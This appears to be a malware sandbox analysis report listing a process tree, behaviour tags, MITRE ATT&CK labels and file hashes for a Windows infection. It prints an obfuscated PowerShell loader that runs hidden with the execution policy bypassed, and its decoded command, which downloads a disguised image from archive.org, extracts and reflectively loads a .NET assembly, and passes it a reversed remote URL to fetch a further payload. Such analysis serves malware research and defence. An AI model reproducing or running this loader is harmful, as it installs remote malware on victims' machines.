⠰ ℁ ⇝ ⾽aQBt♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽ZwBl♺ ⠰ ℁ ⇝ ⾽FQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽LgBJ♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽Hg♺ ⠰ ℁ ⇝ ⾽TwBm♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽RgBs♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽D0♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bQBh♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽ZQBU♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽E8♺ ⠰ ℁ ⇝ ⾽Zg♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽RgBs♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽GY♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cgB0♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽ZwBl♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽M♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽YQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽ZwB0♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Kw♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽RgBs♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽Ew♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bo♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GI♺ ⠰ ℁ ⇝ ⾽YQBz♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Ng♺ ⠰ ℁ ⇝ ⾽0♺ ⠰ ℁ ⇝ ⾽Ew♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bo♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽LQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cgB0♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bi♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cwBl♺ ⠰ ℁ ⇝ ⾽DY♺ ⠰ ℁ ⇝ ⾽N♺ ⠰ ℁ ⇝ ⾽BD♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽bQBt♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽aQBt♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽ZwBl♺ ⠰ ℁ ⇝ ⾽FQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽LgBT♺ ⠰ ℁ ⇝ ⾽HU♺ ⠰ ℁ ⇝ ⾽YgBz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽cgBp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cgB0♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽s♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bi♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cwBl♺ ⠰ ℁ ⇝ ⾽DY♺ ⠰ ℁ ⇝ ⾽N♺ ⠰ ℁ ⇝ ⾽BM♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBn♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GM♺ ⠰ ℁ ⇝ ⾽bwBt♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽QgB5♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽ZQBz♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Fs♺ ⠰ ℁ ⇝ ⾽UwB5♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽LgBD♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽bgB2♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽cgB0♺ ⠰ ℁ ⇝ ⾽F0♺ ⠰ ℁ ⇝ ⾽Og♺ ⠰ ℁ ⇝ ⾽6♺ ⠰ ℁ ⇝ ⾽EY♺ ⠰ ℁ ⇝ ⾽cgBv♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽QgBh♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽2♺ ⠰ ℁ ⇝ ⾽DQ♺ ⠰ ℁ ⇝ ⾽UwB0♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽aQBu♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GI♺ ⠰ ℁ ⇝ ⾽YQBz♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Ng♺ ⠰ ℁ ⇝ ⾽0♺ ⠰ ℁ ⇝ ⾽EM♺ ⠰ ℁ ⇝ ⾽bwBt♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BB♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽cwBl♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YgBs♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽WwBT♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽FI♺ ⠰ ℁ ⇝ ⾽ZQBm♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽ZQBj♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQBv♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽LgBB♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽cwBl♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YgBs♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽XQ♺ ⠰ ℁ ⇝ ⾽6♺ ⠰ ℁ ⇝ ⾽Do♺ ⠰ ℁ ⇝ ⾽T♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽YwBv♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽bQBh♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BC♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽QQBz♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽ZQBt♺ ⠰ ℁ ⇝ ⾽GI♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽B5♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽RwBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽V♺ ⠰ ℁ ⇝ ⾽B5♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bu♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽aQBi♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽SQBP♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽S♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽Ow♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽bQBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽RwBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽TQBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽FY♺ ⠰ ℁ ⇝ ⾽QQBJ♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgB2♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽awBl♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bu♺ ⠰ ℁ ⇝ ⾽HU♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Cw♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽Bb♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YgBq♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽YwB0♺ ⠰ ℁ ⇝ ⾽Fs♺ ⠰ ℁ ⇝ ⾽XQBd♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽MQBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽cwBh♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Lw♺ ⠰ ℁ ⇝ ⾽z♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽awBs♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YgBq♺ ⠰ ℁ ⇝ ⾽DM♺ ⠰ ℁ ⇝ ⾽LwB3♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cg♺ ⠰ ℁ ⇝ ⾽v♺ ⠰ ℁ ⇝ ⾽HY♺ ⠰ ℁ ⇝ ⾽ZQBk♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽ZQBk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YwBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽cwBh♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Lw♺ ⠰ ℁ ⇝ ⾽v♺ ⠰ ℁ ⇝ ⾽Do♺ ⠰ ℁ ⇝ ⾽cwBw♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bo♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽s♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽x♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽s♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽JwBD♺ ⠰ ℁ ⇝ ⾽Do♺ ⠰ ℁ ⇝ ⾽X♺ ⠰ ℁ ⇝ ⾽BQ♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽bwBn♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽YQBt♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽X♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽L♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽By♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽egBh♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQB2♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽s♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽dgBh♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽bw♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Cw♺ ⠰ ℁ ⇝ ⾽JwBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽cwBh♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQB2♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽L♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽L♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽DM♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽fQB9♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('♺ ⠰ ℁ ⇝ ⾽','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://archive.org/download/nativee/nativee.jpg', 'https://archive.org/download/nativee/nativee.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.1etsap/3lkltbj3/war/ved.edocetsap//:sptth' , '1' , 'C:\ProgramData\' , 'desprezativo','desativado','desativado','','3'))}}"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55a7bc6830d316e05571c769a7d345c3e
SHA1eac4444a04a1942d97d9ea7635e89296b9bd41f0
SHA256de8fb64eb788cdb5e91930f682ef35396b2ee27379ad9baf98345b5f41b2cd4c
SHA512bf5ccefaab222a17554dbd15dd45f6cfc35e65cc4527903160d03a803b0a7b8cbaa64c669aa3fd3d854afe377b735a86e69a9ae277f9ecca28bd2a3f5bd2e04d